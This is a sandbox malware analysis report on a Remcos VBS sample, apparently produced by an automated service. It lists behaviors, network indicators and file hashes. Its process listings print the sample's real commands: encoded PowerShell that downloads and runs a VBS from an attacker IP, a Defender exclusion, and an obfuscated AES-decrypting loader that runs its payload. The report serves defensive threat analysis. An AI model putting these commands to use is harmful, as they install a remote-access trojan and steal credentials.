Analysis Overview
SHA256
e6e8a9afd766ad37eb26f95a91ce4f85183ec483242d86845e87c5bdaeec9f0d
Threat Level: Known bad
The file MalwareBazaar.8 was found to be: Known bad.
Malicious Activity Summary
Remcos
Detected Nirsoft tools
NirSoft WebBrowserPassView
NirSoft MailPassView
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-19 11:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-19 11:07
Reported
2024-07-19 11:10
Platform
win7-20240708-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.vbs" /elevate
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==
Network
Files
memory/2244-4-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/2244-5-0x0000000001E80000-0x0000000001E88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b0613d13084544a308a419fcf4b5a20e |
| SHA1 | 0e30d02f64789dfb4e8931daaf1ce99e38616e5a |
| SHA256 | 89b616cda0badb10dcd49179a14e182ab5e4ef8e2935c46c3465b2e94a3d0108 |
| SHA512 | d2709330602e88f9de9832dcbec4e826cf08e66b6b14847f6248ec99dd31c8b079909a3465c1908f2ffbaf72e935e0abacdb59a6cd516d15ad7ec951196c5a3b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-19 11:07
Reported
2024-07-19 11:10
Platform
win10v2004-20240709-en
Max time kernel
147s
Max time network
141s
Command Line
Signatures
Remcos
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 668 set thread context of 2184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2184 set thread context of 2460 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2184 set thread context of 4264 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2184 set thread context of 4308 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.vbs" /elevate
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI38252555980957241034615985855951CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnItyg30b2mPiin84dCXPYANAtNIMJrqHOYn2KTcOOVppbWc8q7E33whW3SgdTP4sjB+TWzniBqOGHiuCQ4Y49h1Btkm9Jra+JrtKddvNse+AMDwT/U73Lg/HLqyCgw9/H12ozMqugKnaQVKh9N7e59XtHcBlySItADKItTs6terp+uw9udYNzw6FvcAoM79HCA8tNsCODQU9s9do+WqdCibUSEsXgyOPFvQWRCIhedlAb5TwwyHT7pbiFdmOthryrCKvk1lcHH7bbNclCK3KxmKAdTg2CKQiA/EFW30DMGHKdgU1fe4xorJPChAgRzcZPBVNCW2fz/JP+l3q6P21vJUdr2gNhXJ2wI5nBvZ/BdQpVtfF66qBpvvjSNeFHaZQ4PE2lxpHpaghrC93FxtStvfYR5WcbzZ9hiMqAlPAFGctqa869qbjRfC7uWkp+ff11SG/YcWyvGioqn6QSSrISG/0sIoSvCwFOlezrAKikTRMs7fCu15CKIvob3S28rPW1EB/gTQeEC74Rwcy2n3zc8nf3LbP7NeRFWb7iarDlYdCNEfPidEaUZVTgIQdi+WKCm6ZDQn8Ske5ZBvgxC2DPMgUrl7rZ4EgVKW4lhUf2siQBITqt8e2AZ/Q7WrXt1HnsO1fjt5cgh/NoMZA4nOqFOjIrSarKOql2qV0Eab52EDqxdbxIwVvI/1kRiJfuUj6GN28FMj/eNWECOfERCY0kB+duLdS7I5cemA00VL8v6GHEPJ5UPnBJtUALs8KTn5WvCIkiZMSslD1+ijFbW8mkYZcqMeG+WqRfPP0YhexjdNamdAnoo+FlNUPdlrcBMYlh/oIOm/MvYFmDJoe+aqpozlApMWVPTZaWjaSLlAKHGv1/C5EQyyOdkHuAUYxVqg1NKCXch93jW7/kERB2WtvCSmk343Tj18sPlf7p9T1a0XuUWF6EhCgBXu1YkN6j8Ptk7Xdr6sX1cJXvNY93a0G23HNx4DluZZa9BzvqAQ8Rfc4noUvkKCc0FankjjaaiaWy368YbhRPUO8x3T8e8fUrMHZ6nG5BpG+g0UgsXaXGXHBtbOPK0jdWyRoZiEw3Kuoui3QoVygHPcbrVssEkAr3ROU9UVoJ5kMuIUQb74S8k63nj+Ho2Ga6yeMT/N4pOh22WVI+UqXn23IL3NDATKE6sprc/byS3eGZKNDDO7Q5asglt/0BHw1zMmwGCtwHQiwdU8YJrucBW7bajieLo3EsQGsxxBcqReQqjxMH5vg4lICoNC9uYYYQbcpk9op9eBLnX4TueRVHi1BlR462h22LI3keBwVUxxq05VVVpH6zsz8C5b835Y6SatJcIEU46h9g56vhwf8qUQ3sX6/m2j7FYCmRL1SdcFC9NOEs7z8BAPHicNM2d7z6ztL8NDIFjY4gXc/X4WfPwsHu9kVhnEJ4OfQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nuvfxxwroaberpxtahobdjyrpkvrbb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nuvfxxwroaberpxtahobdjyrpkvrbb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nuvfxxwroaberpxtahobdjyrpkvrbb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nuvfxxwroaberpxtahobdjyrpkvrbb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nuvfxxwroaberpxtahobdjyrpkvrbb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\poayyphscitiudmxsrivgoliyzfaumvhb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\arniz"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 172.245.135.143:80 | 172.245.135.143 | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.135.245.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastecode.dev | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 172.66.43.27:443 | pastecode.dev | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.43.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 198.46.176.133:80 | 198.46.176.133 | tcp |
| US | 8.8.8.8:53 | 133.176.46.198.in-addr.arpa | udp |
| US | 172.245.135.143:80 | 172.245.135.143 | tcp |
| US | 8.8.8.8:53 | 2024remcmon.duckdns.org | udp |
| US | 192.210.214.9:14645 | 2024remcmon.duckdns.org | tcp |
| US | 192.210.214.9:14645 | 2024remcmon.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 9.214.210.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/4184-9-0x000001B252A40000-0x000001B252A62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rj5hxd3m.n4n.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b90efd974eddd9f07d74e6daa9285779 |
| SHA1 | eab0a1356a4bbd54f8d2f0d1b1373c5ec5dcb3bb |
| SHA256 | b525be72aa216eb30620c35eb5bb4dd6f40e2a05998d7886a0a86c1b3ca05272 |
| SHA512 | d7c27366fd984c10d99a51d48944ebf4525b95a201705169ecf5242a802669eb9964fc2afefb1eaae8c91cda265d4e5e508a71697eb9e807160a6097e00e53ff |
C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS
| MD5 | 2718814507f5502e05d21540f0ebc5e1 |
| SHA1 | 5e33409f382ac6f9d52c8c49e0a0b12ce4dd2140 |
| SHA256 | d6ebd048f0ef80ea876bf28ac630c903b3c960bc7448ab8072f32a0e3e4334aa |
| SHA512 | ac5285820ba227dc4362150015244d5fd92be79c283ad1c30fb4683ef847491b08e7d92321278925a47de5c2215ea836958ab8a2cc6a8ed3429e9f4777bd0e8c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QOWVUGSW\paste1[1].txt
| MD5 | ad6c37ef980373e9bcbd14810fad34bc |
| SHA1 | 9c061a1b3608b7c7f1db7cd06c8246913ee11bda |
| SHA256 | ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c |
| SHA512 | 30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f |
memory/668-49-0x000001A77B920000-0x000001A77BA42000-memory.dmp
memory/2184-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-55-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-56-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-59-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-62-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2460-63-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2460-66-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4264-64-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2460-69-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4264-67-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4308-65-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2460-71-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4308-73-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4308-72-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4264-70-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nuvfxxwroaberpxtahobdjyrpkvrbb
| MD5 | 5f9f645ff4e46b384ac7a261904aabcb |
| SHA1 | 203a1216e576f93c2236a833b93c32c4fd8a0d3b |
| SHA256 | 887d93e6cbd14afa0cdf26f303b89cc1963ca5c5d7faba6c91ae87be183273b3 |
| SHA512 | b679e91072a1c3fa59e40ff6565c23549f33520c9c6bc8d1f4e055d65dddec3a8e93c165060668fbabae9f27de28985cc826b23f8402caa5d7bd4455165acbde |
memory/2184-79-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2184-83-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2184-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-82-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2184-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-86-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-87-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2184-92-0x0000000000400000-0x0000000000482000-memory.dmp